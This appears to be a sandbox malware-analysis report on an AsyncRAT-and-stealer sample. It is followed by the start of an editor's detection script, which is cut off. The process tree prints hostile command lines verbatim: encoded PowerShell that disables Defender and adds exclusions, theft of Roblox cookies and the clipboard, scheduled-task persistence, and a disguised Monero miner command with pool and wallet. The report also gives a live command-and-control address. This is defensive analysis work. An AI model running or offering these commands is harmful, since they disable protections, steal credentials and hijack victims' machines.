Analysis
max time kernel: 52s
max time network: 81s
platform: windows11-21h2_x64
resource: win11-20241007-en
resource tags: arch:x64, arch:x86, image:win11-20241007-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 28-10-2024 18:07
Static task: static1
Behavioral task: behavioral1
  Sample: munchenlatest.zip
  Resource: win10ltsc2021-20241023-en
Behavioral task: behavioral2
  Sample: munchenlatest.zip
  Resource: win11-20241007-en
General
Target: munchenlatest.zip
Size: 8.8MB
MD5: 8a426208fc37e756dffd738ecb77b305
SHA1: d06b79e9fb69d443da7d1ffe8dbf2c6992e64c4b
SHA256: 7b97c5e022c4225bfc79606d9dcc30c0d8b9bac4a8fcbd60a2236cf1db0305d9
SHA512: 6caa2f63c0341fa91f9bc142071b022f46b5b4d084b57419066b02b8fd535478fbb16528dfc4354ef510e027cbe6aa7f3b10738a0c0482db3df1cab404b97d9b
SSDEEP: 196608:EQuDY9mHqfFqhwz7koW/qrerJaJyHCrg4Kd0HDFQz2nkVONDsNIy:EZDYwHLyPkV2eV6yyOAeQkVImF
Malware Config
Extracted
asyncrat
1.0.7
Guppies
198.98.58.93:999
SYSTEMSPOOF
delay: 1
install: true
install_file: Core Sound Service.exe
install_folder: %AppData%
Signatures
- Asyncrat family
- Async RAT payload 1 IoCs
  Processes (resource yara_rule):
    C:\Users\Admin\AppData\Local\Temp\Core Sound Service.exe family_asyncrat
-
  Processes (pid process):
    3808 powershell.exe
    6032 powershell.exe
    5048 powershell.exe
    5112 powershell.exe
- Drops file in Drivers directory 3 IoCs
  Processes (description ioc process):
    File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe
    File opened for modification C:\Windows\System32\drivers\etc\hosts rundii.exe
    File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe
- Clipboard Data 1 TTPs 2 IoCs
  Adversaries may collect data stored in the clipboard from users copying information within or between applications.
- Executes dropped EXE 12 IoCs
  Processes (pid process):
    1576 munchenlatest.exe
    2312 rundii32.exe
    3676 rundii.exe
    4028 splwow64.exe
    4088 Core Sound Service.exe
    3424 rundii.exe
    2400 munchenlatest.exe
    4384 rundii32.exe
    1336 rundii.exe
    3024 splwow64.exe
    112 Core Sound Service.exe
    4624 rundii.exe
- Loads dropped DLL 33 IoCs
- Reads user/profile data of web browsers 3 TTPs
  Infostealers often target stored browser data, which can include saved credentials etc.
- Unsecured Credentials: Credentials In Files 1 TTPs
  Steal credentials from unsecured files.
- Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
- Looks up external IP address via web service 1 IoCs
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Processes (flow ioc):
    2 ip-api.com
- Obfuscated Files or Information: Command Obfuscation 1 TTPs
  Adversaries may obfuscate content during command execution to impede detection.
- Enumerates processes with tasklist 1 TTPs 4 IoCs
  Processes (pid process):
    4356 tasklist.exe
    2412 tasklist.exe
    5848 tasklist.exe
    5576 tasklist.exe
- Enumerates physical storage devices 1 TTPs
  Attempts to interact with connected storage/optical drive(s).
- Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
  Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
  Processes (description ioc process):
    Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe
    Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe
    Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe
- System Location Discovery: System Language Discovery 1 TTPs 10 IoCs
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  Processes (description ioc process):
    Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe
    Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language munchenlatest.exe
    Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe
    Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe
    Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe
    Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language munchenlatest.exe
    Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundii32.exe
    Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe
    Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe
    Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundii32.exe
- System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
  Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
- Detects videocard installed 1 TTPs 1 IoCs
  Uses WMIC.exe to determine videocard installed.
- Gathers system information 1 TTPs 1 IoCs
  Runs systeminfo.exe.
- Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  Processes (pid process):
    5988 schtasks.exe
    1516 schtasks.exe
- Suspicious behavior: EnumeratesProcesses 35 IoCs
- Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  Processes (pid process):
    2232 7zFM.exe
- Suspicious use of AdjustPrivilegeToken 60 IoCs
- Suspicious use of FindShellTrayWindow 2 IoCs
  Processes (pid process):
    2232 7zFM.exe
    2232 7zFM.exe
- Suspicious use of SetWindowsHookEx 8 IoCs
  Processes (pid process):
    1576 munchenlatest.exe
    2312 rundii32.exe
    3676 rundii.exe
    3424 rundii.exe
    2400 munchenlatest.exe
    4384 rundii32.exe
    1336 rundii.exe
    4624 rundii.exe
- Suspicious use of WriteProcessMemory 64 IoCs
- Views/modifies file attributes 1 TTPs 2 IoCs
  Processes (pid process):
    6024 attrib.exe
    1336 attrib.exe
Processes
- C:\Program Files\7-Zip\7zFM.exe (depth 1)
  cmdline: "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\munchenlatest.zip"
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:2232
- C:\Users\Admin\Desktop\munchenlatest.exe (depth 1)
  cmdline: "C:\Users\Admin\Desktop\munchenlatest.exe"
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:1576
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 2)
    cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:644
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 2)
    cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAeABlACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHAAYgB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdQBwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAaABzACMAPgA="
    decoded (base64 of UTF-16LE; the <#...#> fragments are junk block comments used as obfuscation): <#yxe#>Add-MpPreference <#pby#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#vup#> -Force <#vhs#>
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4504
  - C:\Users\Admin\AppData\Local\Temp\rundii32.exe (depth 2)
    cmdline: "C:\Users\Admin\AppData\Local\Temp\rundii32.exe"
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2312
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 3)
      cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAbQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAcwB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAdgBoACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAcABjACMAPgA="
      decoded (base64 of UTF-16LE): <#dmx#>Add-MpPreference <#gsy#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#zvh#> -Force <#dpc#>
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID:948
    - C:\Users\Admin\AppData\Local\Temp\rundii.exe (depth 3)
      cmdline: "C:\Users\Admin\AppData\Local\Temp\rundii.exe"
      - Executes dropped EXE
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory
      PID:3676
      - C:\Users\Admin\AppData\Local\Temp\rundii.exe (depth 4)
        cmdline: "C:\Users\Admin\AppData\Local\Temp\rundii.exe"
        - Drops file in Drivers directory
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of SetWindowsHookEx
        - Suspicious use of WriteProcessMemory
        PID:3424
        - C:\Windows\system32\cmd.exe (depth 5)
          cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\rundii.exe'"
          - Suspicious use of WriteProcessMemory
          PID:1152
          - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 6)
            cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\rundii.exe'
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID:5112
        - C:\Windows\system32\cmd.exe (depth 5)
          cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
          - Suspicious use of WriteProcessMemory
          PID:4820
          - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 6)
            cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID:3808
        - C:\Windows\system32\cmd.exe (depth 5)
          cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          - Suspicious use of WriteProcessMemory
          PID:3332
          - C:\Windows\system32\tasklist.exe (depth 6)
            cmdline: tasklist /FO LIST
            - Enumerates processes with tasklist
            - Suspicious use of AdjustPrivilegeToken
            PID:2412
        - C:\Windows\system32\cmd.exe (depth 5)
          cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          - Suspicious use of WriteProcessMemory
          PID:3120
          - C:\Windows\system32\tasklist.exe (depth 6)
            cmdline: tasklist /FO LIST
            - Enumerates processes with tasklist
            - Suspicious use of AdjustPrivilegeToken
            PID:4356
        - C:\Windows\system32\cmd.exe (depth 5)
          cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
          PID:4952
          - C:\Windows\System32\Wbem\WMIC.exe (depth 6)
            cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
            - Suspicious use of AdjustPrivilegeToken
            PID:5860
        - C:\Windows\system32\cmd.exe (depth 5)
          cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
          - Clipboard Data
          PID:4500
          - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 6)
            cmdline: powershell Get-Clipboard
            - Clipboard Data
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID:5836
        - C:\Windows\system32\cmd.exe (depth 5)
          cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          PID:4904
          - C:\Windows\system32\tasklist.exe (depth 6)
            cmdline: tasklist /FO LIST
            - Enumerates processes with tasklist
            - Suspicious use of AdjustPrivilegeToken
            PID:5848
        - C:\Windows\system32\cmd.exe (depth 5)
          cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F"
          PID:3288
          - C:\Windows\system32\tree.com (depth 6)
            cmdline: tree /A /F
            PID:5712
        - C:\Windows\system32\cmd.exe (depth 5)
          cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
          - System Network Configuration Discovery: Wi-Fi Discovery
          PID:224
          - C:\Windows\system32\netsh.exe (depth 6)
            cmdline: netsh wlan show profile
            - Event Triggered Execution: Netsh Helper DLL
            - System Network Configuration Discovery: Wi-Fi Discovery
            PID:5828
        - C:\Windows\system32\cmd.exe (depth 5)
          cmdline: C:\Windows\system32\cmd.exe /c "systeminfo"
          PID:4776
          - C:\Windows\system32\systeminfo.exe (depth 6)
            cmdline: systeminfo
            - Gathers system information
            PID:5812
        - C:\Windows\system32\cmd.exe (depth 5)
          cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
          PID:2040
          - C:\Windows\system32\reg.exe (depth 6)
            cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
            PID:5804
        - C:\Windows\system32\cmd.exe (depth 5)
          cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"
          PID:2388
          - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 6)
            cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID:5872
            - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe (depth 7)
              cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kxrwcx4z\kxrwcx4z.cmdline"
              PID:4920
              - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe (depth 8)
                cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES82D7.tmp" "c:\Users\Admin\AppData\Local\Temp\kxrwcx4z\CSC43C355535A964C629B8F2016B0B11213.TMP"
                PID:5500
        - C:\Windows\system32\cmd.exe (depth 5)
          cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F"
          PID:5968
          - C:\Windows\system32\tree.com (depth 6)
            cmdline: tree /A /F
            PID:4020
        - C:\Windows\system32\cmd.exe (depth 5)
          cmdline: C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
          PID:5428
          - C:\Windows\system32\attrib.exe (depth 6)
            cmdline: attrib -r C:\Windows\System32\drivers\etc\hosts
            - Drops file in Drivers directory
            - Views/modifies file attributes
            PID:1336
        - C:\Windows\system32\cmd.exe (depth 5)
          cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F"
          PID:5600
          - C:\Windows\system32\tree.com (depth 6)
            cmdline: tree /A /F
            PID:6040
        - C:\Windows\system32\cmd.exe (depth 5)
          cmdline: C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
          PID:6080
          - C:\Windows\system32\attrib.exe (depth 6)
            cmdline: attrib +r C:\Windows\System32\drivers\etc\hosts
            - Drops file in Drivers directory
            - Views/modifies file attributes
            PID:6024
        - C:\Windows\system32\cmd.exe (depth 5)
          cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F"
          PID:5200
          - C:\Windows\system32\tree.com (depth 6)
            cmdline: tree /A /F
            PID:5464
        - C:\Windows\system32\cmd.exe (depth 5)
          cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          PID:3972
          - C:\Windows\system32\tasklist.exe (depth 6)
            cmdline: tasklist /FO LIST
            - Enumerates processes with tasklist
            - Suspicious use of AdjustPrivilegeToken
            PID:5576
        - C:\Windows\system32\cmd.exe (depth 5)
          cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F"
          PID:5604
          - C:\Windows\system32\tree.com (depth 6)
            cmdline: tree /A /F
            PID:5360
        - C:\Windows\system32\cmd.exe (depth 5)
          cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F"
          PID:5564
          - C:\Windows\system32\tree.com (depth 6)
            cmdline: tree /A /F
            PID:1248
        - C:\Windows\system32\cmd.exe (depth 5)
          cmdline: C:\Windows\system32\cmd.exe /c "getmac"
          PID:5064
          - C:\Windows\system32\getmac.exe (depth 6)
            cmdline: getmac
            PID:5532
        - C:\Windows\system32\cmd.exe (depth 5)
          cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
          PID:3248
          - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 6)
            cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
            - Command and Scripting Interpreter: PowerShell
            PID:6032
        - C:\Windows\system32\cmd.exe (depth 5)
          cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
          PID:5916
          - C:\Windows\System32\Conhost.exe (depth 6)
            cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            PID:5836
          - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 6)
            cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
            PID:4384
        - C:\Windows\system32\cmd.exe (depth 5)
          cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI36762\rar.exe a -r -hp"blank" "C:\Users\Admin\AppData\Local\Temp\xTiN6.zip" *"
          PID:5920
          - C:\Users\Admin\AppData\Local\Temp\_MEI36762\rar.exe (depth 6)
            cmdline: C:\Users\Admin\AppData\Local\Temp\_MEI36762\rar.exe a -r -hp"blank" "C:\Users\Admin\AppData\Local\Temp\xTiN6.zip" *
            PID:4136
        - C:\Windows\system32\cmd.exe (depth 5)
          cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption"
          PID:860
          - C:\Windows\System32\Conhost.exe (depth 6)
            cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            PID:2388
          - C:\Windows\System32\Wbem\WMIC.exe (depth 6)
            cmdline: wmic os get Caption
            PID:5376
        - C:\Windows\system32\cmd.exe (depth 5)
          cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
          PID:4268
          - C:\Windows\System32\Conhost.exe (depth 6)
            cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            PID:5604
          - C:\Windows\System32\Wbem\WMIC.exe (depth 6)
            cmdline: wmic computersystem get totalphysicalmemory
            PID:2372
        - C:\Windows\system32\cmd.exe (depth 5)
          cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
          PID:6096
          - C:\Windows\System32\Wbem\WMIC.exe (depth 6)
            cmdline: wmic csproduct get uuid
            PID:2976
        - C:\Windows\system32\cmd.exe (depth 5)
          cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
          PID:476
          - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 6)
            cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
            - Command and Scripting Interpreter: PowerShell
            PID:5048
        - C:\Windows\system32\cmd.exe (depth 5)
          cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
          PID:4180
          - C:\Windows\System32\Wbem\WMIC.exe (depth 6)
            cmdline: wmic path win32_VideoController get name
            - Detects videocard installed
            PID:5124
        - C:\Windows\system32\cmd.exe (depth 5)
          cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
          PID:5680
          - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 6)
            cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
            PID:656
    - C:\Users\Admin\AppData\Local\Temp\splwow64.exe (depth 3)
      cmdline: "C:\Users\Admin\AppData\Local\Temp\splwow64.exe"
      - Executes dropped EXE
      PID:4028
      - C:\Windows\System32\conhost.exe (depth 4)
        cmdline: "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\splwow64.exe"
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID:5676
        - C:\Windows\System32\cmd.exe (depth 5)
          cmdline: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\services64.exe"
          PID:2032
          - C:\Windows\system32\schtasks.exe (depth 6)
            cmdline: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\services64.exe"
            - Scheduled Task/Job: Scheduled Task
            PID:5988
        - C:\Windows\System32\cmd.exe (depth 5)
          cmdline: "cmd" cmd /c "C:\Users\Admin\services64.exe"
          PID:4376
          - C:\Users\Admin\services64.exe (depth 6)
            cmdline: C:\Users\Admin\services64.exe
            PID:3100
    - C:\Users\Admin\AppData\Local\Temp\Core Sound Service.exe (depth 3)
      cmdline: "C:\Users\Admin\AppData\Local\Temp\Core Sound Service.exe"
      - Executes dropped EXE
      PID:4088
- C:\Users\Admin\Desktop\munchenlatest.exe (depth 1)
  cmdline: "C:\Users\Admin\Desktop\munchenlatest.exe"
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2400
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 2)
    cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1692
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 2)
    cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAeABlACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHAAYgB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdQBwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAaABzACMAPgA="
    decoded (base64 of UTF-16LE): <#yxe#>Add-MpPreference <#pby#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#vup#> -Force <#vhs#>
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4652
  - C:\Users\Admin\AppData\Local\Temp\rundii32.exe (depth 2)
    cmdline: "C:\Users\Admin\AppData\Local\Temp\rundii32.exe"
    - Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4384 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAbQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAcwB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAdgBoACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAcABjACMAPgA="3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1432 -
C:\Users\Admin\AppData\Local\Temp\rundii.exe"C:\Users\Admin\AppData\Local\Temp\rundii.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1336 -
C:\Users\Admin\AppData\Local\Temp\rundii.exe"C:\Users\Admin\AppData\Local\Temp\rundii.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:4624 -
C:\Users\Admin\AppData\Local\Temp\splwow64.exe"C:\Users\Admin\AppData\Local\Temp\splwow64.exe"3⤵
- Executes dropped EXE
PID:3024 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\splwow64.exe"4⤵PID:5192
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\services64.exe"5⤵PID:5612
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\services64.exe"6⤵
- Scheduled Task/Job: Scheduled Task
PID:1516 -
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"5⤵PID:4776
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:14433 --user=83bM5DoDitniDg2ooQitzWKzapHhSvJmL8kn1dDcr4ST6wU8U6Cj7TN3FRXWJK3fDXNQBRf5TQ5qN2o1aCxi7vrxSi5T26L.ObamaNet --pass=johnlovesbbc --cpu-max-threads-hint=60 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=100 --tls --cinit-stealth5⤵PID:2728
-
C:\Users\Admin\AppData\Local\Temp\Core Sound Service.exe"C:\Users\Admin\AppData\Local\Temp\Core Sound Service.exe"3⤵
- Executes dropped EXE
PID:112
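The tree above shows five behaviours worth a detection rule each: hardware fingerprinting through cmd.exe (csproduct UUID, video controller, PROCESSOR_IDENTIFIER, the backup product key), an encoded PowerShell call that adds Defender exclusions for the whole user profile and system drive with junk `<# #>` comments as obfuscation, an at-logon scheduled task with `/rl highest` whose action lives under C:\Users, a miner launched with XMRig-style switches under the name explorer.exe, and dropped binaries that copy or nearly copy Windows names (splwow64, rundii32 for rundll32, sihost64, services64) from user-writable paths. The script below runs those rules over process-creation records; it is an example added by the editor, not part of the sandbox report and not the sample's own code. The records are constructed from command lines copied from the tree; the ProcEvent layout, the rule names and the SYSTEM_NAMES list are the editor's assumptions rather than any vendor's schema.

```python
"""Detections for the chain in the process tree above. Example code added by
the editor, not part of the sandbox report or of the sample. Records are
constructed from command lines copied from the tree; ProcEvent, the rule names
and the SYSTEM_NAMES list are the editor's assumptions, not a vendor schema."""
import base64
import difflib
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    pid: int
    image: str      # full path of the new process
    cmdline: str
    parent_image: str

# -EncodedCommand argument of PID 4652, copied verbatim from the tree.
ENC = ("PAAjAHkAeABlACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA"
       "PAAjAHAAYgB5ACMAPgAgAC0A"
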